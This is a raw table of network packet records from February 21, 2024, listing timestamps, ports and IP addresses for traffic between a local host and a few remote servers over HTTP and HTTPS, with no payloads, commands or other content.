Feb 21, 2024 08:14:09.376574993 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376595974 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376595974 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376672029 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376701117 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376735926 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376751900 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376806021 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376864910 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376882076 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376893997 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376951933 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377002954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377016068 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377027988 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377039909 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377041101 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377053022 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377063036 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377068996 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377082109 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377094984 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377110004 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377115965 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377115965 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377123117 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377131939 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377135992 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377150059 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377168894 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377194881 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377248049 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377268076 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377295971 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377301931 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377311945 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377325058 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377382994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377397060 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377405882 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377405882 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377408028 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377424955 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377439022 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377453089 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377460957 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377460957 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377465963 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377480984 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377492905 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377506971 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377520084 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377521992 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377535105 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377540112 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377547979 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377573013 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377573013 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377573013 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377608061 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377621889 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377644062 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377645969 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377677917 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377677917 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377691984 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377722979 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377738953 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377793074 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377808094 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377820015 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377826929 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377832890 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377846003 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377901077 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377917051 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377931118 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377954006 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.377975941 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.377975941 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378007889 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378020048 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378041983 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378055096 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378078938 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378086090 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378124952 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378124952 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378149986 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378159046 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378190994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378226995 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378283024 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378310919 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378360033 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378374100 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378385067 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378386974 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378385067 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378418922 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378424883 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378474951 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378488064 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378499985 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378521919 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378521919 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378559113 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378571033 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378581047 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378601074 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378603935 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378633022 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378633976 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378655910 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378669024 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378715038 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378741026 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378765106 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378770113 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378813982 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378819942 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378834009 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378890038 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378922939 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.378928900 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378942966 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.378964901 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379010916 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379023075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379033089 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379034042 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379050970 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379061937 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379070044 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379096985 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379108906 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379120111 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379148006 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379151106 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379160881 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379163027 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379163027 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379232883 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379242897 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379255056 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379266024 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379281044 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379293919 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379307985 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379328966 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379331112 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379352093 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379374981 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379388094 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379400015 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379421949 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379442930 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379450083 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379476070 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379489899 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379493952 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379493952 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379522085 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379565001 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379575968 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379590034 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379601955 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379609108 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379631042 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379657030 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379673004 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379690886 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379702091 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379717112 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379729033 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379739046 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379751921 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379764080 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379789114 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379810095 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379833937 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379863977 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379880905 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379925013 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379928112 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.379940033 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379951954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379973888 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.379983902 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.380013943 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.380028009 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.380049944 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.380060911 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.380085945 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.380095005 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.380199909 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.539674997 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.539714098 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.539740086 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.539768934 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.539783955 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.539794922 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.539819956 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.539855003 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.539927959 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.545523882 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.551769018 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.551798105 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.552000046 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.552021027 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.552145958 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.556252003 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.562280893 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.562367916 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.562386990 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.580142975 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580161095 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580173016 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580188036 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580205917 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580214977 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580219984 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580236912 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580245018 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580249071 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580261946 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580261946 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580276012 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580290079 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580290079 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580302954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580316067 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580316067 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580352068 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580358028 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580466986 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580473900 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580487013 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580498934 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580513000 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580523968 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580526114 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580539942 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580550909 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580554962 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580568075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580579042 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.580586910 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.580614090 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.604290009 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.627299070 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.630321980 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.630341053 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.630393028 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.630409956 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.630657911 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.636517048 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.642604113 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.642653942 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.642673969 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.648709059 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.648745060 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.648767948 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.648773909 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.648972034 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.655016899 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.661212921 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.661278963 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.661298037 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.661319971 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.661550045 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.667356968 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.672352076 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.672379017 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.672426939 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.672450066 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.672492027 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.677915096 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.683612108 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.683701038 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.683707952 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.683720112 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.683768988 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.689233065 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.689287901 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.689344883 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.689363956 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.697576046 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.697598934 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.697671890 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.697690964 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.697725058 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.697738886 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.697773933 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.698319912 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.698340893 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.721972942 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:10.229136944 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.229170084 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.229231119 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.230218887 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.230235100 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.459676981 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.459991932 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.460015059 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.460320950 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.460988998 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.461049080 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.462419033 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.462464094 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.462523937 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.463138103 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.463156939 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.463409901 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.463423014 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.531666040 CET	443	49703	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:10.531749964 CET	49703	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:10.645029068 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.645076990 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.645107985 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.645134926 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.645158052 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.645181894 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.645224094 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.645230055 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.645382881 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.651144981 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.651616096 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.652065039 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.652127028 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.652646065 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.653273106 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.653362989 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.653449059 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.653476000 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.657517910 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.657562017 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.657568932 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.657574892 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.657633066 CET	49724	443	192.168.2.5	142.250.65.228
